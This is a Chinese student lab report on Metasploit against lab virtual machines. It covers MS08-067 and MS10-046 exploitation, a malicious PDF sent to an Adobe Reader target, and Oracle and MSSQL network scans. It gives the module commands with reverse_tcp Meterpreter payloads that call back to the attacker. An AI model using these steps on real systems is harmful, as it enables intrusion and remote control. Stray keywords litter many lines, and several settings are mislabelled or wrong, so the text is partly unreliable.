20154319 實驗五 MSF基礎應用

 

1、實驗內容sql

(1)一個主動攻擊,如ms08_067;數據庫

(2) 一個針對瀏覽器的攻擊,如ms11_050;windows

(3)一個針對客戶端的攻擊,如Adobe;api

(4)成功應用任何一個輔助模塊。瀏覽器

2、實驗後問題回答安全

(1)用本身的話解釋什麼是exploit,payload,encode。服務器

Exploit就是漏洞利用,有exploit確定有漏洞,因此滲透攻擊就是利用一個系統、應用或服務中的安全漏洞進行攻擊;網絡

Payload就是有效載荷,在滲透攻擊後植入目標系統執行代碼。session

Encode就是編碼,經過改變特徵碼,對攻擊載荷進行「免殺」處理。oracle

(2)離實戰還缺些什麼技術或步驟?

我以爲離實戰還遠得很啊,一是靶機是很低很低的Windowsxp系統,瀏覽器IE版本也很低,在虛擬機上打開網頁的時候都會提醒要更新了,實際上的電腦應該不會有這麼低版本的,也看到有同窗利用了新的漏洞攻擊了Windows7的系統,我也查找了一些其餘的漏洞,仍是由於本身的技術過低沒有完成。二是在攻擊瀏覽器的時候,須要靶機訪問生成的網址,實戰中那麼明顯的IP網址通常不會輕易訪問,仍是要進行假裝。

3、實驗體會

此次實驗是使用漏洞攻擊,真的是作的特別的艱難了,本身的垃圾電腦帶不起來兩個虛擬機,跟同窗合做用兩臺虛擬機常常ping不通(防火牆也關了,抓取ping包那個也設置了也不行),最後直接借了一臺高配置的電腦完成一部分,心累啊~在實驗中以爲要注意一下:一是配置的時候經常使用show options看看配置有沒有錯,有時候暈了的時候會把攻擊的IP和靶機的設置反了,或者是有端口號會變之類的問題;二是看看Linux和win虛擬機能不能ping通。

4、實踐過程

(一)windows服務滲透攻擊(MS08-067漏洞攻擊)

1.使攻擊機與靶機相互ping通,攻擊機IP:10.1.1.242,靶機IP:10.1.1.236

2.啓動msf終端。

使用search命令搜索該漏洞對應的模塊:(能夠看到漏洞的時間是2008年的)

 

啓用該滲透攻擊模塊,選擇運行後門回連控制端的攻擊載荷,配置滲透攻擊所需的配置項:

啓用 :use exploit/windows/smb/ms08_067_netapi 

設置滲透目標IP: set RHOST 10.1.1.236 

設置攻擊機端口: set LPORT 4319 

設置攻擊機IP: set LHOST 10.1.1.242 

設置目標系統類型: set target 0 

 

3.發起滲透攻擊顯示攻擊成功後,在攻擊機上執行ipconfig命令驗證結果,能夠執行:

 

 

(二)瀏覽器滲透攻擊(ms10_046漏洞攻擊)

1.啓動msf終端,使用search命令搜索該漏洞對應的模塊:

 

2. 啓用該滲透攻擊模塊 use exploit/windows/browser/ms10_046_shortcut_icon_dlloader 

選擇運行後門回連控制端的攻擊載荷,用 show payloads

設置攻擊載荷爲: set paylod windows/meterpreter/reverse_tcp 

配置滲透攻擊所需的配置項: show options 

設置服務器地址: set SRVHOST 192.168.43.6 

設置端口: set LPORT 4319 

設置靶機IP: set LHOST 192.168.42.134 

設置完成後鍵入 exploit 發起攻擊:

上圖我錯誤的設置了URIPATH爲4319,應該爲默認的「/」,修改後從新運行

 

 

生成一個URL 地址:http://192.168.43.6:80/

3.在靶機中啓動IE瀏覽器,訪問連接http://192.168.43.6:80/

在攻擊機MSF終端中能夠看到以下信息:

能夠看到從靶機傳來的不少數據。

而在靶機的網頁上回生成兩個文件:

 

4.使用sessions-l命令查看當前監聽端的活動會話。

運行 sessions  命令,查看當前的會話信息

 

奇怪的是我查看了會話信息並無會話,可是以前明明收到來自靶機的信息,而後回到靶機上查看,發現是靶機卡住了,網頁沒有響應,而後個人整個電腦都卡住了,最後只能強制關機了,但已經能看到從靶機傳回來的數據,因此算是成功了 

 

(三)Adobe閱讀器滲透攻擊

1.使攻擊機與靶機相互ping通,攻擊機IP:10.1.1.242,靶機IP:10.1.1.190

2.啓動msf終端。

配置滲透攻擊所需的配置項:

設置載荷: set payload windows/meterpreter/reverse_tcp 

設置攻擊機IP: set LHOST 10.1.1.242 

設置端口: set LPORT 8443 

設置產生的文件: set FILENAME 4319.pdf 

設置完成後鍵入 exploit 

 

3.根據路徑找到該pdf文件放到靶機裏。

4.使用命令 back 退出當前模塊,啓動一個對應於載荷的監聽端,等待靶機回連,並執行 exploit 

5.在靶機中雙擊打開該文件,監聽端接到來自靶機的Meterpreter鏈接,輸入命令 sysinfo ,可對靶機環境進行基本的查詢,攻擊成功:

 

 

(四)Oracle數據庫服務查點

各類網絡數據庫的網絡服務端口是漏洞頻發的「重災區」,好比Microsoft SQL Server的1433端口(第五部分),以及Oracle SQL監聽器(tnslsnr)使用的1521端口。可使用mssql_ping模塊查找網絡中的Microsoft SQL Server,使用tnslsnr_version模塊查找網絡中開放端口的Oracle監聽器服務。

1.使用  use auxiliary/scanner/oracle/tnslsnr_version  模塊查找網絡中開發端口的Oracle監聽器服務。

2.設置相關配置項:(先用 show options 查看要設置的內容)

設置掃描區段: set RHOST 172.30.4.0/24 

設置線程: set THREADS 50 

命令 run 開始掃描,掃描完成,但沒有在網絡中發現後臺服務器上開放的Oracle數據庫。

 

(五)mssql掃描

配置不當的MS SQL一般是進入目標系統的第一個後門。

MS SQL安裝後,默認監聽在TCP端口1433或使用隨機的動態TCP端口。隨機狀況下,使用mssql_ping模塊,獲取隨機的TCP端口。

當Metasploit發現MS SQL服務器後,他會將全部可以獲取的關於服務器的信息都顯示出來。

1.使用  use auxiliary/scanner/oracle/tnslsnr_version 模塊

2.設置相關配置項:(先用 show options 查看要設置的內容)

設置掃描區段: set RHOST 172.30.4.0/24 

設置線程: set THREADS 50 

命令 run 開始掃描,掃描完成,也沒有發現數據庫。

相關文章
相關標籤/搜索